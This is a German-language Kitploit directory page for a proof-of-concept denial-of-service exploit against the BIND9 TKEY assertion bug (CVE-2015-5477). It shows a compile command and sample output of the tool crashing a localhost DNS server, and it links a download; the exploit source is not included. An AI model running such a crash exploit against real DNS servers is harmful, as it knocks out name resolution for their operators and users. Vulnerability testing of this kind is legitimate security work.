Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/robertdavidgraham/cve-2015-5477
SchwachstellenanalyseExploitationPenetrationstestsDNS-Analyse
GitHubrobertdavidgraham/cve-2015-5477

cve-2015-5477

PoC-Exploit für CVE-2015-5477 BIND9 TKEY-Assertionsfehler

Repository anzeigen
64423vor 11 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PoC für BOND9 TKEY assert DoS (CVE-2015-5477)

Dieser Exploit testet, ob ein BIND9-Server verwundbar ist, indem er den Exploit sendet, um zu sehen, ob er abstürzt.

Es ist C-Code, den Sie auf Unix/Windows auf normale Weise kompilieren, z.B.:

root@kitploit:~
# gcc tkill.c -o tkill

Es läuft über IPv4 und IPv6.

So sieht es aus, wenn es gegen localhost läuft. Da es zwei IP-Adressen bei der Auflösung des Namens erhält, wird es beide versuchen. Es fragt zuerst die "version"-Zeichenkette ab, dann sendet es den Exploit. Wenn es die zweite Adresse testet, schlägt die Versionsabfrage fehl, weil der Dienst bereits vom ersten Versuch abgestürzt ist.

root@kitploit:~
root@kali:~/cve-2015-5477# ./a.out localhost
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] localhost: Resolving to IP address
[+] localhost: Resolved to multiple IPs (NOTE)
[+] ::1: Probing...
[+] Querying version...
[+] ::1: "9.11.0pre-alpha"
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed

[+] 127.0.0.1: Probing...
[+] Querying version...
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] Can't query server, is it crashed already?
[-] Sending exploit anyway.
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed
Tool herunterladen